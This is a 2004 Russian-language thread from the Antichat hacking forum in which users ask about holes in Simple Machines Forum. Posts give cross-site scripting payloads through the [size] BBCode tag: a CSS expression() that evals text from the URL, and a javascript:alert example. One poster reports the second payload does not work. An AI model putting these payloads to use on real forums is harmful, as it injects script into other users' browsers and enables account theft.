ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
Перезагрузить страницу Вопрос про уязвимости в Simple machines forum
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Вопрос про уязвимости в Simple machines forum
  #1  
Старый 19.08.2004, 02:37
Аватар для
Guest
Сообщений: n/a
Провел на форуме:

Репутация:
По умолчанию Вопрос про уязвимости в Simple machines forum
Кто знает дырки в нем есть
 
Ответить с цитированием

  #2  
Старый 26.08.2004, 19:55
Аватар для Sky
Sky
Новичок
Регистрация: 26.08.2004
Сообщений: 5
Провел на форуме:
0

Репутация: 0
По умолчанию
И что мона с этим сотварить?</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">SMF не фильтрует данные, представленные пользователем в тэге '[size]'. Пример:

[size=expression(eval(unescape(document.URL.substr ing(document.URL.
length-41,document.URL.length))))]Big Exploit[/size]

[/QUOTE]<span id='postcolor'>
 
Ответить с цитированием

  #3  
Старый 26.08.2004, 22:40
Аватар для Че Гевара
Че Гевара
Администратор
Регистрация: 05.10.2003
Сообщений: 1,083
Провел на форуме:
4618051

Репутация: 45


По умолчанию
Вставить скрипт...
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">
[size=javascript:alert('LOL');]LOL[/size]
[/QUOTE]<span id='postcolor'>
Это чисто пример ...
 
Ответить с цитированием

  #4  
Старый 27.08.2004, 11:53
Аватар для Sky
Sky
Новичок
Регистрация: 26.08.2004
Сообщений: 5
Провел на форуме:
0

Репутация: 0
По умолчанию
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (Че Гевара @ августа 26 2004,22:40)</td></tr><tr><td id="QUOTE">Вставить скрипт...
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">
[size=javascript:alert('LOL');]LOL[/size]
[/QUOTE]<span id='postcolor'>
Это чисто пример ...[/QUOTE]<span id='postcolor'>
Спасибо тебе конечно за пример но он не прокатывает
 
Ответить с цитированием

  #5  
Старый 27.08.2004, 14:09
Аватар для Че Гевара
Че Гевара
Администратор
Регистрация: 05.10.2003
Сообщений: 1,083
Провел на форуме:
4618051

Репутация: 45


По умолчанию
Ты же написал, что не фильтруются данные ...
Смотри по форуму конкретному ...
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Вопрос про уязвимости в ExBB 1.9 cardons Форумы 10 30.01.2006 23:57
ЕсТь ВоПрос Guma Чаты 4 26.10.2005 21:48
XSS в Simple Machines Forum (SMF) 1.0.3 (и другие) KEZ Уязвимости 5 04.06.2005 20:24
SMF 1.0.1. (Simple Machines Forum) FST Уязвимости 10 08.04.2005 14:36
Вопрос про уязвимости в exbb Форумы 1 02.08.2004 19:17



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ